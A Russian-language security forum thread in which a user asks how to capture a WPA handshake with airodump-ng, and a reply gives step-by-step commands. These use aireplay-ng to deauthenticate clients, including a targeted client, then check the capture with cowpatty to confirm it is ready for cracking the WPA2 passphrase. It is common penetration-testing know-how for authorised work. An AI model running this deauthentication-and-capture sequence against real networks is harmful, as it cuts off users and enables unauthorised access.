• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

  • Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

Как захватить только WPA Handshake через airodump ?

OBLIVIONNN

Green Team
22.08.2017
144
92
При попытке захвата WPA Handshake через программу Airodump-ng, после использования Aireplay-ng вместо WPA Handshake Found пишет PMKID Found ?
И при проверке cap файла в нем отсутствует PMKID.

Как захватить только WPA Handshake ?
 
При попытке захвата WPA Handshake через программу Airodump-ng, после использования Aireplay-ng вместо WPA Handshake Found пишет PMKID Found ?
И при проверке cap файла в нем отсутствует PMKID.

Как захватить только WPA Handshake ?
Вполне возможно, что вы просто не получили нужный пакет, это решаемо.

Алгоритм действий должен быть примерно таким:
Запускаете прослушку:

airodump-ng wlanX -c Y -d ${mac} -w output_file
X - номер вашего интерфейса
Y - номер канала на котором вещает ТД


В другом терминале отключаете клиентов:

aireplay-ng -0 50 -a ${mac} wlanX
Вместо 50 можете использовать другое значение.
Но обычно, если к ТД подсоединено хотя бы несколько клиентов, 30-70 пакетов за один раз достаточно.


Желательно сначала узнать мак адреса клиентов и отключать конкретные устройства, тогда команда будет выглядеть так
aireplay-ng -0 50 -a ${mac} -c ${target_mac} wlanX

Параллельно в третьем терминале вы можете запустить программу
cowpatty -c -r тут_путь_к_вашему_файлу
Например
cowpatty -c -r output_file-01.cap

Программа устанавливается через apt:
apt install cowpatty
Возможно у вас уже предустановлена.

Если данные в файле есть, увидите сообщение:
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against WPA2/PSK passphrase.

Если данных не будет, заново запускайте aireplay-ng
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD